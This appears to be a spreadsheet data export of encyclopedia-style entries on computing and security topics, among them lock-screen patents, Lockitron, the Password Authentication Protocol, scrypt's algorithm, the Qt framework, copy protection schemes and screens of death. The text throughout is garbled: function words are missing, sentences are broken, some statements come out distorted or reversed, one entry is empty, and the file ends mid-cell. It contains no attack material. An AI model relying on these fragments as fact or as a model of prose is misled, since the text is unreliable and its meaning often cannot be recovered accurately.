glance produces lock screen replacement displays content feed lock screen, monetized advertising. patent litigation apple holds several patents related sliding lock screen used devices: granted u.s. patent 7,657,849 2010, u.s. patent 8,046,721 2011, describing system involves continuously dragging image certain point unlock device. part ongoing patent wars numerous companies surrounding patents related mobile devices, apple asserted patents several patent infringement lawsuits outside united states competing vendors.apple's lawsuits samsung netherlands united kingdom failure: courts ruled patents invalid, citing similar lock screen mobile phone manufactured swedish company neonode, prior apple's design. british court specifically ruled apple's lock screen "obvious improvement" neonode additional visual feedback on-screen slider graphic (unlike displayed written instruction explaining gesture). early work touchscreen technology university maryland human computer interaction also cited prior art, particular 1991 touchscreen slider developed catherine plaisant.in january 2012, apple permanent injunction german court ruled motorola mobility violated patents recent devices (although motorola xoom tablet ruled infringed patent). however, apple warned would required bond insurance allow injunction take effect, potential sales result would limited germany. references also screensaver touch screen mobile security</t>
  </si>
  <si>
    <t>Lockitron</t>
  </si>
  <si>
    <t>lockitron device lock unlock doors remote control, typically smartphone. lockitron made apigy, start-up based mountain view, california. apigy graduate combinator start-up accelerator.multiple models lockitron manufactured, including fits lock control mechanism inside door, door unlocked phone, page control. phones bluetooth energy (4.0) also automatically unlock door authenticated device nearby. supplied read trigger command toggle state lock.virtual "keys" also created guests repair contractors etc., allows access home. virtual keys distributed internet demand, also revoked demand. door also locked unlocked "key" without smartphones.all models lockitron allow traditional lock continues work traditional metal keys. when metal used, models lockitron send notification smartphone.lockitron exposes open, web-accessible api. lockitron supports integration ring video doorbell, doorbell system sends video voice door smartphone. other devices integrated lockitron include pebble smartwatch, allows directly lock unlock lockitron wrist, ifttt, connects lockitron platforms devices like amazon alexa, google home, nest.for period time apigy developed lockitron office previously housed byte shop first apple computers sold. apigy hosted open house location several working apple computers attendees play classic games like tron pacman.the chamberlain group announced early 2019 acquired lockitron order integrate door locks platform. crowdfunded lockitron apigy originally offered full replacement door lock version lockitron 2011 announcing version lockitron 2012 preexisting deadbolt locks. 2012 version lockitron incorporated number improvements 2011 lockitron deadbolt including built-in wifi, replacing wired basestation, built-in auto-unlock technology bluetooth energy, simplified installation making lockitron device fits preexisting deadbolt lock. crowdfunded lockitron built around atmega microprocessor meaning arduino compatible custom behavior. crowdfunded lockitron rejected kickstarter, crowdfunding changed policies regarding hardware funding. creators claim rejection lockitron's status "home improvement" product, confirmed kickstarter. after rejection, founders apigy, cameron robertson paul gerhardt, built crowdfunding website matter days used garner million preorders first week campaign october 2012. apigy subsequently open-sourced crowdfunding software selfstarter, alternative crowdfunding site. selfstarter used successful tile crowdfunding campaign later formed basis crowdhoster crowdtilt open.the crowdfunded lockitron significantly delayed originally anticipated ship date july 2013, shipping small numbers 2013. february 2014, crowdfunded lockitron still shipped substantial numbers prompting coverage blog techcrunch. 2014 thousands units shipped. early 2015, apigy announced product, lockitron bolt, replacement crowdfunded lockitron ceased production crowdfunded lockitron manufacturing product issues. lockitron bolt lockitron bolt priced offers bluetooth connectivity comparison predecessor priced offered built-in wifi; optional device called bridge connects lockitron bolt wifi networks giving remote capabilities 2012 lockitron.in late 2015 apigy announced first lockitron bolt devices would ship november 2015 also announcing add-on lockitron bolt, keypad. series updates late 2016 indicated remaining lockitron bolt units owed backers produced remaining orders u.s. customers shipped customers. references external links official website</t>
  </si>
  <si>
    <t>Lockout chip</t>
  </si>
  <si>
    <t>general sense, lockout chip chip within electronic device prevent manufacturers using company's device perform certain functions. notable example lockout chip found nintendo's nintendo entertainment system (called 10nes), designed prevent "unlicensed" manufacturers creating games console. presence chip forced unlicensed companies raise price cartridge (due bypass chip added cartridge), allowed nintendo foothold lawsuit. lockout functions commonly used printers prevent manufacture third-party toner cartridges. also regional lockout (nintendo) vendor lock-in software protection dongle lexmark int'l static control components, u.s. sixth circuit case rejecting copyright-related claims lockout chips references</t>
  </si>
  <si>
    <t>Password Authentication Protocol</t>
  </si>
  <si>
    <t>password authentication protocol (pap) password-based authentication protocol used point-to-point protocol (ppp) validate users. specified 1334. almost network operating systems support pap, network access servers. also used pppoe, authenticating users. point-to-point protocol (ppp) sends data unencrypted clear", vulnerable attacker observe session. attacker users name, password, information associated session. some additional security gained link using chap eap. however, always tradeoffs choosing authentication method, single answer secure. when used ppp, considered weak authentication scheme. weak schemes simpler lighter computational overhead complex schemes transport layer security (tls), much vulnerable attack. while weak schemes used transport layer expected physically secure, home link. where transport layer physically secure system transport layer security (tls) internet protocol security (ipsec) used instead. other uses also used describe password authentication protocols radius diameter. however, protocols provide transport network layer security, therefore usage security issues seen used ppp. benefits when client sends clear-text password, authentication server receive compare "known good" password. since authentication server received password clear-text, format stored password chosen secure rest". attacker steal entire database passwords, computationally infeasible reverse function recover plaintext password. result, passwords less secure sent link, allow secure storage rest" methods chap. working cycle authentication done time initial link establishment, verifies identity client using two-way handshake. client sends username password. this sent repeatedly response received server. server sends authentication-ack credentials authentication-nak (otherwise) packets packet embedded frame. protocol field value c023 (hex). also service access point notes references lloyd, brian; simpson, william allen (1992). "password authentication protocol". authentication protocols. ietf. doi:10.17487/rfc1334. 1334. retrieved july 2015.</t>
  </si>
  <si>
    <t>List of security assessment tools</t>
  </si>
  <si>
    <t>this list available software hardware tools designed particularly suited various kinds security assessment security testing. operating systems tool suites several operating systems tool suites provide bundles tools useful various types security assessment. operating system distributions kali linux (formerly backtrack), penetration-test-focused linux distribution based debian pentoo, penetration-test-focused linux distribution based gentoo parrotos, linux distro focused penetration testing, forensics, online anonymity. tools external links sectools.org: network security tools list security tools suggested community</t>
  </si>
  <si>
    <t>List of remastering software</t>
  </si>
  <si>
    <t>following list remastering slipstreaming software articles wikipedia: windows utilities -*not fully supported. linux utilities also comparison disk cloning software external links "remaster tools". livedistro. archived original october 2011. retrieved october 2011.</t>
  </si>
  <si>
    <t>Password Safe</t>
  </si>
  <si>
    <t>password safe free open-source password manager program originally written microsoft windows supporting wide area operating systems compatible clients available linux, freebsd, android, ios, blackberry operating systems well. linux version available ubuntu (including kubuntu xubuntu derivatives) debian. java-based version also available sourceforge. page, users find links unofficial releases running android, blackberry, mobile operating systems. history program initiated bruce schneier counterpane systems, hosted sourceforge (windows) github (linux) developed group volunteers. design after filling master password user access account data entered saved previously. data organized categories, searched, sorted based references easy user remember.there various combinations mouse clicks copy parts stored data (password, email, username etc.), autofill feature (for filling forms). program minimize automatically period idle time clears clipboard. possible compare synchronize (merge) different password databases. program generate automatic backups. password safe support database sharing, single-file database shared external sharing method (for example syncthing, dropbox etc.). database stored online. features note: uncited information section sourced official help file included application password management stored passwords sectioned groups subgroups tree structure. changes entries tracked, including history previous passwords, creation time, modification time, last access time, expiration time password stored. text notes entered password details. import export password list exported various file formats including txt, previous versions password safe. password safe also supports importing files password safe supports importing files exported keepass version (v1). keepass version (v2) allows databases exported keepass database, turn imported password safe.password safe cannot directly import file exported keepass fields different. however, help file provides instructions processing exported file multiple xslt files (included password safe) produce password safe compatible file imported. file encryption password safe encrypt file using derived passphrase provided user command-line interface. password generator software features built-in password generator generates random passwords. user also designate parameters password generation (length, character set, etc.), creating "named password policy" different passwords created. cryptography original password safe built bruce schneier's blowfish encryption algorithm. rony shapiro implemented twofish encryption along improvements 3.xx series password safe. keys derived using equivalent pbkdf2 sha-256 configurable number iterations, currently 2048.in paper analysing various database formats password storage programs security vulnerabilities researchers found format used password safe (version format) resistant various cryptographic attacks. reception reviewers highlighted program's simplicity best feature. also list password managers password manager references external links official website password safe filehare.com password safe schneier.com pwsafe password safe clone password safe softonline.net passwdsafe google play</t>
  </si>
  <si>
    <t>List of chatbots</t>
  </si>
  <si>
    <t>this list notable chatbots. chatbots text-based conversation agents interact human users medium, instant message service. some chatbots designed specific purposes, others converse human users wide range topics. classic chatbots sbaitso eliza parry racter claude chatterbot) mark shaney engati chatbot general chatbots albert 1998 1999 loebner winner, robby garner. a.l.i.c.e. 2001, 2002, 2004 loebner prize winner developed richard wallace. charlix cleverbot (winner 2010 mechanical intelligence competition) eugene goostman 2012 turing winner, vladimir veselov. fred early chatterbot robby garner. jabberwacky jeeney lenny audio designed annoy telemarketers megahal simsimi popular artificial intelligence conversation program created 2002 ismaker. spookitalk chatterbot used npcs douglas adams' starship titanic video game. ultra 2007 loebner prize winner, robert medeksza. verbot chatbots googlyminotaur, specializing radiohead, first released activebuddy (june 2001-march 2002) smarterchild, developed activebuddy released june 2001 infobot, assistant channels #perl, primarily help answering frequently asked questions (june 1995-today) also chatbot references external links chatterbots curlie chatbots.org international chatterbots directory chatterbot collection large index chatterbots, articles, resources, media related material</t>
  </si>
  <si>
    <t>Seahorse (software)</t>
  </si>
  <si>
    <t>seahorse gnome front-end application managing passwords, keys. seahorse integrates number apps including nautilus file manager, epiphany browser evolution e-mail suite. ldap server support. support implemented utilizing privacy guard. passwords securely stored encrypted user's login password using gnome keyring. seahorse released free software gpl-2.0-or-later license. developers responsibility maintenance development seahorse changed hands several times lifetime: niels graef (3.29.x present) daiki ueno (3.29.x present) nate nielsen (real name stef walter) (0.7.4 present) jacob perkins (0.6.x 0.7.3) jose garcía sogo (0.5.x) jean schurger also comparison password managers list password managers password manager cryptography gnome keyring references external links project home page seahorse repository gnome gitlab</t>
  </si>
  <si>
    <t>ScummVM</t>
  </si>
  <si>
    <t>Scrypt</t>
  </si>
  <si>
    <t>cryptography, scrypt (pronounced "ess crypt") password-based derivation function created colin percival march 2009, originally tarsnap online backup service. algorithm specifically designed make costly perform large-scale custom hardware attacks requiring large amounts memory. 2016, scrypt algorithm published ietf 7914. simplified version scrypt used proof-of-work scheme number cryptocurrencies, first implemented anonymous programmer called artforz tenebrix followed fairbrix litecoin soon after. introduction password-based derivation function (password-based kdf) generally designed computationally intensive, takes relatively long time compute (say order several hundred milliseconds). legitimate users need perform function operation (e.g., authentication), time required negligible. however, brute-force attack would likely need perform operation billions times, point time requirements become significant and, ideally, prohibitive. previous password-based kdfs (such popular pbkdf2 laboratories) relatively resource demands, meaning require elaborate hardware much memory perform. they therefore easily cheaply implemented hardware (for instance asic even fpga). this allows attacker sufficient resources launch large-scale parallel attack building hundreds even thousands implementations algorithm hardware search different subset space. this divides amount time needed complete brute-force attack number implementations available, possibly bringing reasonable time frame. scrypt function designed hinder attempts raising resource demands algorithm. specifically, algorithm designed large amount memory compared password-based kdfs, making size cost hardware implementation much expensive, therefore limiting amount parallelism attacker use, given amount financial resources. overview large memory requirements scrypt come large vector pseudorandom strings generated part algorithm. once vector generated, elements accessed pseudo-random order combined produce derived key. straightforward implementation would need keep entire vector accessed needed. because elements vector generated algorithmically, element could generated needed, storing element memory time therefore cutting memory requirements significantly. however, generation element intended computationally expensive, elements expected accessed many times throughout execution function. thus significant trade-off speed large memory requirements. this sort time–memory trade-off often exists computer algorithms: speed increased cost using memory, memory requirements decreased cost performing operations taking longer. idea behind scrypt deliberately make trade-off costly either direction. thus attacker could implementation require many resources (and therefore massively parallelized limited expense) runs slowly, implementation runs quickly large memory requirements therefore expensive parallelize. algorithm function scrypt inputs: this algorithm includes following parameters: passphrase: bytes string characters hashed salt: bytes string random characters modifies hash protect rainbow table attacks costfactor (n): integer cpu/memory cost parameter must power (e.g. 1024) blocksizefactor (r): integer blocksize parameter, fine-tunes sequential memory read size performance. commonly used) parallelizationfactor (p): integer parallelization parameter. 232-1 hlen/mflen) desiredkeylen (dklen): integer desired length bytes (intended output length octets derived key; positive integer satisfying dklen (232− hlen.) hlen: integer length octets hash function sha256). mflen: integer length octets output mixing function (smix below). defined rfc7914. output: derivedkey: bytes array bytes, desiredkeylen long step generate expensive salt blocksize 128*blocksizefactor length bytes) smix mixing function output (e.g. 128*8 1024 bytes) pbkdf2 generate initial 128*blocksizefactor*p bytes data (e.g. 128*8*3 3072 bytes) treat result array elements, entry blocksize bytes (e.g. elements, 1024 bytes) [b0...bp−1] pbkdf2hmac-sha256(passphrase, salt, blocksize*parallelizationfactor) block costfactor times using romix function (each block mixed parallel) romix(bi, costfactor) elements "expensive" salt expensivesalt b0∥b1∥b2∥ ∥bp-1 concatenation step pbkdf2 generate desired number bytes, using expensive salt generated return pbkdf2hmac-sha256(passphrase, expensivesalt, desiredkeylen); where pbkdf2(p, dklen) notation defined 2898, iteration count. this notation used 7914 specifying usage pbkdf2 function romix(block, iterations) create iterations copies block iterations−1 blockmix(x) iterations−1 integerify(x) iterations blockmix(x return where 7914 defines integerify(x) result interpreting last bytes little-endian integer since iterations equals power first ceiling(n bytes among last bytes interpreted little-endian integer actually needed compute integerify(x) iterations iterations iterations. function blockmix(b): block 128-byte chunks (which equivalent 64-byte chunks) length(b) 128; treat array 64-byte chunks [b0...b2r-1] b2r−1 2r−1 salsa20/8(x salsa20/8 hashes 64-bytes 64-bytes return y0∥y2∥...∥y2r−2 y1∥y3∥...∥y2r−1 where salsa20/8 8-round version salsa20. cryptocurrency uses scrypt used many cryptocurrencies proof-of-work algorithm. first implemented tenebrix (released september 2011) served basis litecoin dogecoin, also adopted scrypt algorithm. mining cryptocurrencies scrypt often performed graphics processing units (gpus) since gpus tend significantly processing power (for algorithms) compared cpu. this shortages high gpus rising price currencies months november december 2013.as 2014, specialized asic mining hardware available scrypt-based cryptocurrencies. utility scrypt utility written 2009 colin percival demonstration scrypt derivation function. it's available linux distributions. also argon2 winner password hashing competition 2015 bcrypt blowfish-based password-hashing function bcrypt blowfish-based cross-platform file encryption utility developed 2002 crypt unix library function crypt unix utility ccrypt utility derivation function stretching mcrypt utility pbkdf2 widely used standard password-based derivation function pufferfish cache-hard password hashing function based improved bcrypt design space–time tradeoff references external links scrypt page tarsnap website. original scrypt paper. scrypt github</t>
  </si>
  <si>
    <t>Qt (software)</t>
  </si>
  <si>
    <t>(pronounced "cute") cross-platform software creating graphical user interfaces well cross-platform applications various software hardware platforms linux, windows, macos, android embedded systems little change underlying codebase still native application native capabilities speed. currently developed company, publicly listed company, project open-source governance, involving individual developers organizations working advance available commercial licenses open-source 2.0, 3.0, lgpl licenses. purposes abilities used developing graphical user interfaces (guis) multi-platform applications major desktop platforms mobile embedded platforms. most programs created native-looking interface, case classified widget toolkit. non-gui programs also developed, command-line tools consoles servers. example non-gui program using cutelyst framework.qt supports various compilers, including compiler, visual studio suite, extension php5, extensive internationalization support. also provides quick, includes declarative scripting language called allows using javascript provide logic. with quick, rapid application development mobile devices became possible, logic still written native code well achieve best possible performance. other features include database access, parsing, json parsing, thread management network support. releases latest version 6.3. also still supported, commercial users, 5.15 lts, released 2020, lts, released september 2021 long-term support (lts) versions generally supported three years, commercial license, 5.15 support extended five years, supported longer 2025. addition project provides unofficial support for, least, 5.15, i.e. commercial users. 2017, company estimated community million developers worldwide industries. desktop graphical user-interfaces desktop environments utilize qt/qml widget toolkit: plasma, libre desktop environment various computing devices (deepin desktop environment) linux deepin ukui (ubuntu kylin user interface) cutefishde lxqt (lightweight desktop environment) lumina, desktop environment designed bsd-based trueos lomiri (formerly unity8), convergent desktop environment started canonical, maintained ubports maui shell, also features suite unity desktop shell written trinity continuously developed fork based kde3 sddm, display manager wayland compatible written qml. (this display manager desktop environment.) embedded mobile actively developed maintained asteroidos, open source operating system designed smartwatches avionics, panasonic's in-flight entertainment system blackberry touchscreen-based mobile blackberry ltd. sailfish mobile operating system developed jolla plasma mobile, touch-based developed luneos, community-driven successor palm/hp webos nemo mobile, based lomiri, formerly known unity8, phone developed ubports, originally canonical tesla model in-car webos, multitask operating system smart devices like smartwatches home entertainment system available, inactive meego handset tablet qtopia, system nokia embedded mobile devices applications using many notable open-source proprietary cross-platform software using qml: organizations using utilized wide range companies organizations software architecture concepts built concepts: complete abstraction when first released, used paint engine controls, emulating look different platforms runs drew widgets. this made porting work easier classes really depended target platform; however, occasionally slight discrepancies emulation imperfect. recent versions native style apis different platforms, platforms native widget set, query metrics draw controls, suffer issues often. platforms (such meego kde) native api. some portable graphical toolkits made different design decisions; example, wxwidgets uses toolkits target platform implementations. signals slots language construct introduced communication objects makes easy implement observer pattern avoiding boilerplate code. concept widgets send signals containing event information received controls using special functions known slots. metaobject compiler metaobject compiler, termed moc, tool sources program. interprets certain macros code annotations, uses generate added code meta information classes used program. this meta information used provide programming features available natively c++: signals slots, introspection asynchronous function calls. language bindings used several programming languages c++, python, javascript, rust language bindings; many languages bindings bindings modules starting framework split individual modules. with architecture modularized even further. split essential add-on modules. essentials add-ons editions there four editions available: community, indie mobile, professional enterprise. community version open source licenses, indie mobile, professional enterprise versions, contain additional functionality libraries, e.g. enterprise controls commercially sold company. supported platforms works many different platforms; following officially supported: after nokia opened source code community gitorious, various ports appeared. there also ports available, supported anymore. these platforms listed list platforms supported also current community support lesser known platforms, sailfishos. licensing available following free software licenses: 2.0, 3.0, lgpl lgpl (with special exception). note modules available license, means applications link modules need comply license.in addition, always available commercial license, like commercial license, allows developing proprietary applications restrictions licensing. tools comes tools ease cross-platform development, otherwise cumbersome different development tools. creator cross-platform qml. designer's layout/design functionality integrated ide, although designer still started standalone tool. addition creator, provides qmake, cross-platform build script generation tool automates generation makefiles development projects across different platforms. there tools available including designer interface builder assistant help browser (which embedded creator), linguist translation tool, (user interface compiler), (meta-object compiler). history early developments summer 1990, haavard nord eirik chambe-eng (the original developers president, respectively, trolltech) working together database application ultrasound images written running unix, microsoft windows. they began development "qt" 1991, three years company incorporated quasar technologies, changed name troll tech trolltech.the toolkit called letter looked appealing haavard's emacs typeface, inspired toolkit.the first versions flavors: qt/x11 unix qt/windows windows. 1995 troll tech publicly released 0.90 x11/linux source code free edition license. this license viewed compliant free software definition free software foundation because, source available, allow redistribution modified versions. trolltech used license version 1.45. controversy erupted around 1998 became clear desktop environment going become leading desktop environments linux. based many people free software movement worried essential piece major operating systems would proprietary. windows platform available proprietary license, meant free/open source applications written could ported windows without purchasing proprietary edition. becoming free software–friendly with release version toolkit mid-1999, license changed public license (qpl), free software license, regarded free software foundation incompatible gpl. compromises sought trolltech whereby would able fall restrictive license qpl, even trolltech bought went bankrupt. this creation free foundation, guarantees would fall bsd-style license free/open source version released months.in 2000, qt/x11 released ending controversy regarding compatibility. 2001, trolltech released 3.0, added support (now known macos). support available proprietary license june 2003, trolltech released support available gpl. 2002, members cygwin project began porting licensed qt/x11 code base windows. this response trolltech's refusal license qt/windows grounds windows free/open source software platform. project achieved reasonable success although never reached production quality. this resolved trolltech released also windows june 2005. supported platforms free software/open source editions proprietary edition, possible, later releases, create gpl-licensed free/open source applications using supported platforms. special exception later added added licensing option. exception allows final application licensed various gpl-incompatible free software/open source licenses mozilla public license 1.1. acquisition nokia nokia acquired trolltech june 2008 changed name first software, development frameworks. nokia focused turning main development platform devices, including port symbian platform. version nokia released june 2010. source code made available gitorious, community oriented source code repository, goal creating broader community using improving january 2009, version added another option, lgpl, make attractive non-gpl open source projects closed applications.in february 2011, nokia announced decision drop symbian technologies base future smartphones windows phone platform instead (and since support platform also dropped). month later, nokia announced sale qt's commercial licensing professional services digia, immediate goal taking support android, windows platforms, continue focusing desktop embedded development, although nokia remain main development force behind framework time. merging demerging digia march 2011, nokia sold commercial licensing part digia, creating commercial. august 2012, digia announced would acquire nokia. team digia started work september 2012. they released within month newer versions every months features additional supported platforms. september 2014, digia transferred business copyrights wholly owned subsidiary, company, owns brands related 2016, digia demerged completely independent companies. project open governance officially released december 2012. this version marked major change platform, hardware-accelerated graphics, javascript playing major role. traditional c++-only qwidgets continued supported, benefit performance improvements available architecture. brings significant improvements speed ease developing user interfaces.framework development moved open governance qt-project.org, made possible developers outside digia submit patches review. contributors aside company, many organizations individuals using development platform participate open development project.one contributor klarälvdalens datakonsult swedish consulting company. kdab involved many areas, including maintenance several components.together rim/blackberry, kdab maintaining blackberry ports qt.another participator intel, contributing example wayland support. audiocodes maintains clearcase support creator.as heavy user project submits many patches features developer library frameworks back also list widget toolkits android software development (web toolkit) bibliography wiki provides comprehensive list english books this list notable books: references external links marketplace official website</t>
  </si>
  <si>
    <t>Scrolling</t>
  </si>
  <si>
    <t>computer displays, filmmaking, television production, kinetic displays, scrolling sliding text, images video across monitor display, vertically horizontally. "scrolling," such, change layout text pictures moves (pans tilts) user's view across apparently larger image wholly seen. common television movie special effect scroll credits, leaving background stationary. scrolling take place completely without user intervention film credits) interactive device, triggered touchscreen keypress continue without intervention user action, entirely controlled input devices. scrolling take place discrete increments (perhaps lines text time), continuously (smooth scrolling). frame rate speed entire image redisplayed. related scrolling changes text image position happen often image redisplayed. when frame rate limiting factor, smooth scrolling technique blur images movement would otherwise appear "jump". computing implementation scrolling often carried computer (software scrolling) graphics processor. some systems feature hardware scrolling, image offset displayed, without frame buffer manipulation (see also hardware windowing). this especially common 16bit video game consoles. paradigms wimp-style graphical user interface (gui), user-controlled scrolling carried manipulating scrollbar mouse, using keyboard shortcuts, often arrow keys. scrolling often supported text user interfaces command line interfaces. older computer terminals changed entire contents display screenful ("page") time; paging mode requires fewer resources scrolling. scrolling displays often also support page mode. typically certain keys combinations page down; pc-compatible keyboards page page keys space used; earlier computers often used control combinations. some computer mice scroll wheel, scrolls display, often vertically, rolled; others scroll balls tilt wheels allow vertical horizontal scrolling. some software supports ways scrolling. adobe reader mode identified small hand icon ("hand tool") document, dragged clicking moving mouse sliding large sheet paper. when feature implemented touchscreen called kinetic scrolling. touch-screens often inertial scrolling, scrolling motion object continues decaying fashion release touch, simulating appearance object inertia. early implementation behavior "star7" microsystems 1991–1992.scrolling controlled software-dependent ways mouse. some scroll wheels pressed down, functioning like button. depending software, allows horizontal vertical scrolling dragging direction desired; mouse moved original position, scrolling stops. scroll wheels also tilted, scrolling horizontally direction released. touchscreen devices, scrolling multi-touch gesture, done swiping finger screen vertically direction opposite user wants scroll content wide display, horizontal scrolling required view applications graphics spreadsheets often content either width height screen comfortable scale, scrolling directions necessary. text languages written horizontally, western languages, text documents longer screen often displayed wrapped sized screen width, scrolled vertically bring desired content view. possible display lines long display without wrapping, scrolling horizontally view entire line. however, requires inconvenient constant line-by-line scrolling, vertical scrolling needed reading full screenful. software word processors browsers normally uses word-wrapping display many words single line width screen window text organised columns, column. demos scrolling texts, also referred scrolltexts scrollers, played important part birth computer demo culture. software crackers often used deep knowledge computer platforms transform information accompanied releases crack intros. sole role intros scroll text screen impressive way. film television scrolling commonly used display credits films television programs. scrolling often used form news ticker towards bottom picture content television news, scrolling sideways across screen, delivering short-form content. video games computer video games, scrolling playing field allows player control object large contiguous area. early examples method include taito's 1974 vertical-scrolling racing video game speed race, sega's 1976 forward-scrolling racing games moto-cross (fonz) road race, super bug. previously flip-screen method used indicate moving backgrounds. namco galaxian arcade system board introduced galaxian 1979 pioneered sprite system animated pre-loaded sprites scrolling background, became basis nintendo's radar scope donkey kong arcade hardware home consoles nintendo entertainment system.parallax scrolling, first featured moon patrol, involves several semi-transparent layers (called playfields), scroll varying rates order give early pseudo-3d illusion depth.belt scrolling method used side-scrolling beat games downward camera angle players move addition left right. studies 1993 article george fitzmaurice studied spatially aware palmtop computers. these devices sensor, moving device caused contents move contents fixed place. this interaction could referred “moving scroll.” also, user moved device away body, would zoom conversely, device would zoom user pulled device closer them. smartphone cameras “optical flow” image analysis utilize technique nowadays.a 1996 research paper rekimoto analyzed tilting operations scrolling techniques small screen interfaces. users could tilt scroll, also tilt select menu items. these techniques proved especially useful field workers, since needed hold control device hand.a recent study 2013 selina sharmin, oleg špakov, kari-jouko räihä explored action reading text screen text auto-scrolls based user's tracking patterns. control group simply read text screen manually scrolled. study found participants preferred read primarily screen, screen scrolled whenever participants’ eyes began look toward bottom screen. this auto-scrolling caused statistically significant difference reading speed performance. also flip page alternate visual effect navigating digital publications notes references</t>
  </si>
  <si>
    <t>List of copy protection schemes</t>
  </si>
  <si>
    <t>this list notable copy protection schemes various medias. computer software protection schemes dongle hardware containing electronic serial number required software; relatively expensive recovery hardware breaks. product activation requiring user verify license, often entering product order activate software; activation schemes require sending registration information internet prevent product used multiple users. cases, users required call number register receive device-specific serial number. encryption encrypted code together secure cryptoprocessor machine cryptoprocessor could execute program; used systems require high security atms. keyfile file activation needs installed directory software; similarly, disc media (often installation disc) required disk activation. code morphing hiding intermediate code means code obfuscation execution logic visible. this method protect runtime tracing. commercial cd/dvd protection schemes commercial blu-ray disc protection schemes aacs encrypted content decrypted using combination media (obtained media block device keys available reproduction devices) volume (unique identifiers stored disk) media. virtual machine embedded authorized players execute programs included blu-ray discs, allowing verify player's keys, transform output content unscrambled, and/or execute native code patch system vulnerabilities. based concept self-protecting digital content. rom-mark recorders check watermark cannot duplicated consumer-level recorders, allowing authentic media movies, musics games. digital audio/video transmission protection schemes dtcp encrypts interconnection devices "digital home" technologies players televisions restricted. hdcp transmitting device checks sending receiver authorized receive data. data encrypted transmission prevent eavesdropping. serial copy management system records code data bits expresses whether media copy allowed(00), copy once(10) copy prohibited(11). traitor tracing rather directly preventing copying, embeds user information files uploaded, copyright holder could find exactly uploaded file. protection schemes other media cgms-a (analog television signals) inserts waveform non-picture vertical blanking interval (vbi) analog video signal compatible device block restrict recording waveform detected. spiradisc (floppy disk) writes data spiraling paths rather concentric circles. usb-cops (usb-stick) using normal usb-stick key. references</t>
  </si>
  <si>
    <t>Lockstep (computing)</t>
  </si>
  <si>
    <t>lockstep systems fault-tolerant computer systems operations time parallel. redundancy (duplication) allows error detection error correction: output lockstep operations compared determine fault least systems (dual modular redundancy), error automatically corrected least three systems (triple modular redundancy), majority vote. term "lockstep" originates army usage, refers synchronized walking, marchers walk closely together physically practical. lockstep, system progress well-defined state next well-defined state. when inputs reaches system, processes them, generates outputs updates state. this changes (new inputs, outputs, state) considered define step, must treated atomic transaction; words, either happens, none happens, something between. sometimes timeshift (delay) systems, increases detection probability errors induced external influences (e.g. voltage spikes, ionizing radiation, situ reverse engineering). lockstep memory some vendors, including intel, term lockstep memory describe multi-channel memory layout cache lines distributed memory channels, half cache line stored dimm first channel, second half goes dimm second channel. combining single error correction double error detection (secded) capabilities ecc-enabled dimms lockstep layout, single-device data correction (sddc) nature extended double-device data correction (dddc), providing protection failure single memory chip.downsides intel's lockstep memory layout reduction effectively usable amount case triple-channel memory layout, maximum amount memory reduces third physically available maximum), reduced performance memory subsystem. dual modular redundancy where computing systems duplicated, actively process step, difficult arbitrate outputs differ step. reason, common practice systems "master/slave" configurations slave "hot-standby" master, rather lockstep. since advantage slave unit actively process step, common method working master copy state step's processing slave. should master fail point, slave ready continue previous known good step. while either lockstep approach (when combined means detecting errors master) provide redundancy hardware failure master, protect software error. master fails software error, highly likely slave attempting repeat execution step failed simply repeat error fail way, example common mode failure. triple modular redundancy where computing systems triplicated, becomes possible treat "voting" systems. unit's output disagrees two, detected failed. matched output treated correct. also nonstop (server computers) stratus vaxft references external links enabling memory reliability, availability, serviceability features dell poweredge servers, 2005 chipkill correct memory architecture, august 2000, david locklear</t>
  </si>
  <si>
    <t>Screening router</t>
  </si>
  <si>
    <t>screening router performs packet-filtering used firewall. cases screening router used perimeter protection internal network entire firewall solution. references also access control list</t>
  </si>
  <si>
    <t>Screen of death</t>
  </si>
  <si>
    <t>computing, screen death informal term type computer operating system error message, displayed onscreen system experienced fatal system error. computer users dubbed messages "screens death" typically result unsaved work lost often indicate serious problems system's hardware software. these error screens usually result kernel panic, although terms frequently used interchangeably. most screens death displayed even background color message advising user restart computer. known screens death blue screen death (also called bsod, stop error) common name screen displayed microsoft windows operating system critical system error occurs. far, famous screen death. several black screens death known: failure mode windows 3.x. appears bootloader windows vista later fails. also windows previews blue screen death changed black. orange screen death orange screen appears hardware components stumbles fatal error. some experience watching youtube video waking sleep mode. some issue bitlocker, others experienced using external monitor. green screen death green screen appears tivo message includes words "the detected serious problem attempting severe error occurred". appearance often means hard drive corrupted attempt clean check, and/or repair tivo media file system. blue screen death windows insider build appears green instead blue, starting build 14997. green screen death also appears xbox playstation purple screen death used vmware esxi, server virtualization product vmware, inc. displayed event fatal kernel error. screen provides error codes used debugging purposes. four screens death known: appears early beta versions windows vista, later became black screen. another appeared windows beta builds caused advanced configuration power interface (acpi). also appears atari jaguar system loading cartridge error pirated cartridge detected, marked sound roaring jaguar atari jaguar logo screen changes color black red. last playstation screen death, similar startup screen, except startup, screen appears message saying "please insert playstation playstation format disc." sound start screen actually pitched version menu screen creepy whistle ambient sounds like menu. this error obtained inserting non-compatible disc/game disc e.g., disc later xbox discs banner. white screen death appears several operating systems, content management systems bioses. screen death appears white iphone later white ipod touch (5th generation) frozen. everything screen goes white, black apple logo that's displayed screen. yellow screen death occurs asp.net encounters problem crashes. kernel panic used primarily unix unix-like operating systems: unix equivalent microsoft's blue screen death. routine called kernel detects irrecoverable errors runtime correctness; words, continued operation risk escalating system instability, system reboot easier attempted recovery. symbol used older-generation apple macintosh computers, starting original macintosh 128k, indicate severe hardware software problem prevented startup occurring successfully. similar symbol exists ipod. icon featuring frowning folder displayed google chrome crashes. symbol shares face mac. bomb icon symbol displayed classic program application crash. bomb symbols also used atari line computers system encountered fatal system error. number bombs indicated exact cause error. guru meditation name error occurred early versions amiga computers crashed. also used nintendo commonly seen using homebrew. (the screen black, bottom screen white debug font saying "guru meditation error! data abort!" addresses it.) kernel debug land name kernel debugger users haiku/beos dropped kernel crash experienced. also kill screen xbox technical problems (common name hardware error 'red ring death') references</t>
  </si>
  <si>
    <t>List of digital forensics tools</t>
  </si>
  <si>
